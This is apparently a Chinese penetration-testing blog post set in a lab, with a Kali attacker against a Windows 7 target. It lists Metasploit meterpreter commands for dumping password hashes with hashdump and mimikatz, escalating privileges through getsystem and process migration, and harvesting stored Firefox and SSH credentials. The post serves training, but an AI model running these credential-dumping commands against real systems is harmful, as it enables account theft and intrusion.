当前位置:网站首页>内网渗透之内网信息收集(三)
内网渗透之内网信息收集(三)
2022-07-06 09:23:00 【不知名白帽】
目录
内网渗透之内网信息收集(四)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
07口令破解
use post/windows/gather/hashdump //system权限的meterpreter
set session 1
exploit //结果保存在tmp目录下
use post/windows/gather/smart_hashdump
set session 1
exploit
格式
用户名称:RID:LM-HASH值:NT-HASH值
rid是windows系统账户对应固定的值,类似于linux的uid,gid号,500为administartor,501为guest等。而lm-hash和nt-hash,他们都是对用户密码进行的加密,只不过加密方式不同
hashdump使用的是mimikatz的部分功能
load mimikatz
wdigest、kerberos、msv、ssp、tspkg、livessp
mimikatz_command -h
mimikatz_command -f a:: //查询有哪些模块
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
普通用户提权
getuid
查看用户权限
hashdump
需要管理员的权限
getsystem
只是表面上获取了管理员权限,并没有拥有一些真正的管理员权限
ps
查看进程
getpid
查看当前进程
migrate
进程迁移(把普通用户进程迁移到管理员用户的进程上)
hashdump
08other
确定目标主机是否是虚拟机:
run checkvm
获取目标主机上的软件安装信息:
run post/windows/gather/enum_applications
获取目标主机上最近访问过的文档、链接信息:
run post/windows/gather/dumplinks
查看目标环境信息:
run post/windows/gather/env
查看firefox中存储的账号密码:
run post/windows/gather/firefox_creds
查看ssh账号密码的密文信息、证书信息:
run post/windows/gather/ssh_creds
边栏推荐
- 7-7 7003 combination lock (PTA program design)
- JDBC transactions, batch processing, and connection pooling (super detailed)
- C language file operation
- XSS之冷门事件
- Apache APIs IX has the risk of rewriting the x-real-ip header (cve-2022-24112)
- Low income from doing we media? 90% of people make mistakes in these three points
- JVM memory model concept
- The most popular colloquial system explains the base of numbers
- Only 40% of the articles are original? Here comes the modification method
- 强化学习基础记录
猜你喜欢
How to understand the difference between technical thinking and business thinking in Bi?
Callback function ----------- callback
Intranet information collection of Intranet penetration (2)
Internet Management (Information Collection)
记一次api接口SQL注入实战
Web vulnerability - File Inclusion Vulnerability of file operation
Binary search tree concept
Data mining - a discussion on sample imbalance in classification problems
Strengthen basic learning records
《统计学》第八版贾俊平第十一章一元线性回归知识点总结及课后习题答案
随机推荐
小程序web抓包-fiddler
Record once, modify password logic vulnerability actual combat
A complete collection of papers on text recognition
How to test whether an object is a proxy- How to test if an object is a Proxy?
浅谈漏洞发现思路
Xray and burp linkage mining
记一次edu,SQL注入实战
JDBC事务、批处理以及连接池(超详细)
Network technology related topics
XSS (cross site scripting attack) for security interview
HackMyvm靶机系列(3)-visions
7-3 construction hash table (PTA program design)
List and data frame of R language experiment III
7-6 local minimum of matrix (PTA program design)
HackMyvm靶机系列(5)-warez
Bing Dwen Dwen official NFT blind box will be sold for about 626 yuan each; JD home programmer was sentenced for deleting the library and running away; Laravel 9 officially released | Sifu weekly
记一次api接口SQL注入实战
[MySQL table structure and integrity constraint modification (Alter)]
Sword finger offer 23 - print binary tree from top to bottom
On the idea of vulnerability discovery